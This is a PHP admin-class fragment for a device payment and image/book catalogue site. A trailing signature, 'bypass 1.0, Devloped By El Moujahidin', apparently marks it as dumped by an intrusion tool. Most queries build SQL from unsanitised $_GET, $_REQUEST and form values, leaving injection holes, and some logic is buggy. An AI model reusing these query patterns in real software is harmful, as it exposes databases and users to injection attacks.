  $objSmarty->assign('content', $DevDetail[0]['content']);
  $objSmarty->assign('Editor', '$Editor');
  return $DevDetail[0]['content'];*/
 }
 /* Validation for Static Pages */
 function ChkDupliMat($objarray){
  global $objSmarty;
  if(!empty($objarray))
  $SelQueryx		= 'SELECT * FROM `images` WHERE `isbn` = "'.$objarray['isbn'].'" Limit 0,1';
  $DevDetail		= $this->ExecuteQuery($SelQueryx, 'select');
  if(!empty($DevDetail) && is_array($DevDetail))
   return false;
  else
   return true;
 }
 
 
 
  function ChkDupliMat2($objarray){
  global $objSmarty;
  if(!empty($objarray))
   $WhereClause	= '';
  $SelQueryx		= 'SELECT * FROM `images` WHERE `isbn` = "'.$objarray['isbn'].'" AND `m_type` = "'.$objarray['m_type'].'" AND `m_cat` = "'.$objarray['m_cat'].'" Limit 0,1' ;
  $DevDetail		= $this->ExecuteQuery($SelQueryx, 'select');
  if(!empty($DevDetail) && is_array($DevDetail))
   return false;
  else
   return true;
 }
 
 
 /* Delete the Static Page */

 function DeleteID($id){
  global $objSmarty;
  $DelQuery3 = 'DELETE FROM `images`  WHERE `m_name`="'.$_GET[$id].'"'; 
  $this->ExecuteQuery($DelQuery3, 'delete');
  $objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
 }
 
  function RoleList(){
	global $objSmarty;
	 $SelQuery1	= 'SELECT role_name FROM arka_group_mapping WHERE `group_name` = "'.$_SESSION['USER_GROUP'].'" ORDER BY sl_no';
	  $RL		= $this->ExecuteQuery($SelQuery1, "select");

  if(!empty($RL) && is_array($RL))
   foreach($RL as $key=>$value){
    $RL[$key]['role_id'] = stripslashes($RL[$key]['role_id']);
	$RL[$key]['role_name'] = stripslashes($RL[$key]['role_name']);
	$objSmarty->assign('RList', $RL);
  return $RL;
		}
	}


 /* Activate, Deactivate and Delete for the Static Pages */
 function ActiveContent($objArray){
  global $objSmarty;

  if(!empty($objArray['ConId']) && is_array($objArray['ConId']))
   $BanIds		= implode(',' , $objArray['ConId']);
  else
   $objSmarty->assign('ErrorMessage', 'No Content Selected');
  if(!empty($BanIds))
   switch($objArray['Submit']){
    case 'Delete':
	 $DelQuery = 'DELETE FROM `arka_device_reg_master` WHERE `id` IN ( '.$BanIds.' )' ;
	 $this->ExecuteQuery($DelQuery, 'delete');
	 $objSmarty->assign('SuccessMessage', 'Deleted Successfully');
	 break;
	case 'Active':
	 $UpQuery = 'UPDATE `arka_device_reg_master` SET `status` =1 WHERE `id` IN (' . $BanIds . ')' ;
	 $this->ExecuteQuery($UpQuery, 'update');
	 $objSmarty->assign('SuccessMessage', 'The Contents Activated Successfully');
	 break;
	case 'InActive':
	 $UpQuery = 'UPDATE `arka_device_reg_master` SET `status` =0 WHERE `id` IN (' . $BanIds . ')' ;
	 $this->ExecuteQuery($UpQuery, 'update');
	 $objSmarty->assign('SuccessMessage', 'The Contents In-Activated Successfully');
	 break;
   }
 }
 
 function GetBookList($objArray='')  
	{
		global $objSmarty;
		$SelQuery5 = 'SELECT * FROM `recommended_books` WHERE status="1" ORDER BY s_no DESC' ;
		$PageList		= $this->ExecuteQuery($SelQuery5, "select");
        $objSmarty->assign('PageList', $PageList);
	}	
	//Delete Plan List
 function DeleteBookList(){
   
   $SelQuery = 'UPDATE `recommended_books` set status = "0" WHERE image = "'.$_GET['image'].'" ';
   $DList = $this->ExecuteQuery($SelQuery, "update");
    $url_addtnal_data=base64_encode("Recommended Book Deleted Successfully");
   header('location:'.$_SERVER['PHP_SELF']."?sm=".$url_addtnal_data);
  // $objSmarty->assign('DList',$DList);
   
 }
  /* Pay Turbine Amount, Payment status for the Static Pages */
 function TurbinePayments($objArray){
  global $objSmarty;
   if(!empty($objArray['ConId']) && is_array($objArray['ConId']))
   {
   		foreach ($objArray['ConId'] as $DevIds){
				$SelQuery4	= 'SELECT * FROM `arka_dev_payment_details` WHERE device_id = "'.$DevIds.'" Limit 0,1';
	   			$PayDetails	= $this->ExecuteQuery($SelQuery4, 'select');
					   $d_amt_due = stripslashes($PayDetails[0]['amt_due']);
			   if($objArray[$DevIds]>$d_amt_due){
			   		$objSmarty->assign('ErrorMessage', 'Payment Should be Less than Amount Due');
					return false;
				}
				}

      foreach ($objArray['ConId'] as $DevIds){
		   if($DevIds)
		   {
		  		$d_pay_amnt = $objArray[$DevIds];
				$SelQuery4	= 'SELECT * FROM `arka_dev_payment_details` WHERE device_id = "'.$DevIds.'" Limit 0,1';
	   			$PayDetails	= $this->ExecuteQuery($SelQuery4, 'select');
					   $d_pr = stripslashes($PayDetails[0]['price']);
					   $d_amt_due = stripslashes($PayDetails[0]['amt_due']);
					   $d_p_amt = stripslashes($PayDetails[0]['d_payment_amt']);
					   $p_am_due = $d_amt_due-$d_pay_amnt;
					   $d_p_amt = $d_p_amt + $d_pay_amnt;					   
					    if($p_am_due==0)
			   				$p_status ="Paid";
						else
							$p_status ="Pending";
					   $objSmarty->assign('d_p_amt', $d_p_amn);
					   $objSmarty->assign('p_am_due', $p_am_due);
					   $objSmarty->assign('p_status', $p_status);
			 
					$UpQuery = 'UPDATE `arka_dev_payment_details` SET `d_payment_amt` = "'.$d_p_amt.'",`payment_date` = "'.trim(addslashes($objArray['up_date'])).'",`payment_time` = "'.trim(addslashes($objArray['up_time'])).'",`d_payment_status` = "'.$p_status.'",`amt_due` = "'.$p_am_due.'" WHERE `device_id` ="'.$DevIds.'"' ;
					$this->ExecuteQuery($UpQuery, 'update');
					}
  			 }
					
						$SelQuery5	= 'SELECT * FROM `arka_cus_payment_details` WHERE customer_id = "'.trim(addslashes($objArray['cusid'])).'" Limit 0,1';
	   					$PayDetails	= $this->ExecuteQuery($SelQuery5, 'select');
						
					   $tot_amt_due = stripslashes($PayDetails[0]['tot_amt_due']);
					   if($tot_amt_due==0)
							$tot_status ="Paid";
						else
							$tot_status ="Pending";	
						$objSmarty->assign('p_status', $p_status);	
						
						$UpQuery1 = 'UPDATE `arka_cus_payment_details` SET `total_amt` = "'.trim(addslashes($objArray['total'])).'",`tot_amt_due` = "'.trim(addslashes($objArray['amt_due'])).'",`payment_status` = "'.$tot_status.'" WHERE `customer_id` ="'.trim(addslashes($objArray['cusid'])).'"' ;
						$this->ExecuteQuery($UpQuery1, 'update');
					
					$InsQuery3 = 'INSERT INTO `arka_dev_payment_master`(`invoice_no`, `invoice_date`, `pay_ref_no`, `pay_mode`, `pay_to`, `payment_amt`, `payment_due`, `payment_status`) VALUES("'.trim(addslashes($objArray['inv_no'])).'","'.trim(addslashes($objArray['inv_date'])).'","'.trim(addslashes($objArray['p_ref_no'])).'","'.trim(addslashes($objArray['mode'])).'","'.trim(addslashes($objArray['pay_to'])).'","'.trim(addslashes($objArray['p_amt'])).'","'.trim(addslashes($objArray['amt_due'])).'","'.$tot_status.'")';
					$this->ExecuteQuery($InsQuery3, 'insert');
					
					 $objSmarty->assign('SuccessMessage', 'Payment Transcation Successfully Completed');
			
}
  	else
   $objSmarty->assign('ErrorMessage', 'No Turbine Selected');
		}
 	
	
	
	 /* Delete the Static Page */
/* function DeleteID2($deleid){
  global $objSmarty;
  $DelQuery = 'UPDATE `images` set status ="0" WHERE `isbn`="'.$_REQUEST['deleid'].'"';
 // echo($DelQuery);
  $this->ExecuteQuery($DelQuery, 'delete');
   $InsQuery4 = 'INSERT INTO `arka_deleted_records`(`deleted_data`, `deleted_table`, `deleted_by`) VALUES("'.$_REQUEST['deleid'].'","tasca_material_reg_master","'.$_SESSION['UserName'].'")';
	 $this->ExecuteQuery($InsQuery4, 'insert');
  $objSmarty->assign('SuccessMessage', 'Deleted Successfully');
  $this->GetMaterialLists();
 }*/
	
function DeleteID2($id){ 
  global $objSmarty;
 echo  $DelQuery2 = 'update `images` set status ="0" WHERE `m_name`="'.$_GET['book_name'].'" '; 
	$this->ExecuteQuery($DelQuery2, 'delete');
	header('Location:' .$_SERVER['PHP_SELF'].'?server_success1=delete succeed');
	//  $objSmarty->assign('SuccessMessage1', 'Deleted Successfully');
	}
}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net